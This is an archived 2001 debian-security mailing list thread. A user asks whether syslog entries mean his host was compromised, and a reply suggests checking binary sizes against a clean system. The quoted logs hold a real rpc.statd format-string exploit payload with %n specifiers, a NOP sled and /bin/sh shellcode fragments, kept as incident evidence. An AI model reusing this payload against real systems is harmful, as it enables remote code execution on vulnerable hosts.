Re: was I cracked? (rpc.statd, new version)

To: Lukas Eppler <lukas.eppler@tempobrain.com>
Cc: debian-security@lists.debian.org
Subject: Re: was I cracked? (rpc.statd, new version)
From: Alvin Oga <aoga@Mail.Linux-Consulting.com>
Date: Wed, 11 Jul 2001 14:45:38 -0700 (PDT)
Message-id: <[🔎] Pine.LNX.3.96.1010711144148.20736A-100000@Maggie.Linux-Consulting.com>
In-reply-to: <[🔎] 01071111420302.00984@io>

hi ya lukas

how did you check for modified binaries ???

if its an upto date deb box... its a failed attempt...
if its a redhat box...time to go digging...

you have to check the filesize of the binaries... not just the date...
compared to one that you know is NOT compromized...
	and if you really paranoid...run some tests on it..


have fun
alvin
http://www.Linux-Sec.net -- turn if off stuff ..


On Wed, 11 Jul 2001, Lukas Eppler wrote:

> I have the following entries in /var/log/messages:
> 
> Jul  9 01:21:03 blue -- MARK --
> Jul  9 01:21:11 blue
> Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for 
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> Jul  9 01:21:11 blue 
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>\200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul  9 01:41:03 blue -- MARK --
> 
> I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long known 
> exploit fixed. I can't find modified binaries or any strange behaviour... was 
> this a defeated attack? The second line says /bin/sh somewhere which makes me 
> a bit concerned... Was I cracked?
> 
> Lukas
> 
> 
> 
> -- 
> Tempobrain AG - Dufourstrasse 179 - 8008 Zürich
> http://www.tempobrain.com | icq # 5856 2285
> +44 20 7233 6206 | +44 79 8037 7312
> +41  1 389 29 29 | +41 76 373 07 87
> 
> 
> --  
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>

Reply to:

Follow-Ups:
- Re: was I cracked? (rpc.statd, new version)
  - From: Stig Brautaset <stig@brautaset.org>
- Re: was I cracked? (rpc.statd, new version)
  - From: "kath" <kath@kathweb.net>

References:
- was I cracked? (rpc.statd, new version)
  - From: Lukas Eppler <lukas.eppler@tempobrain.com>

Prev by Date: Re: Help needed on snort
Next by Date: Re: was I cracked? (rpc.statd, new version)
Previous by thread: Re: was I cracked? (rpc.statd, new version)
Next by thread: Re: was I cracked? (rpc.statd, new version)
Index(es):
- Date
- Thread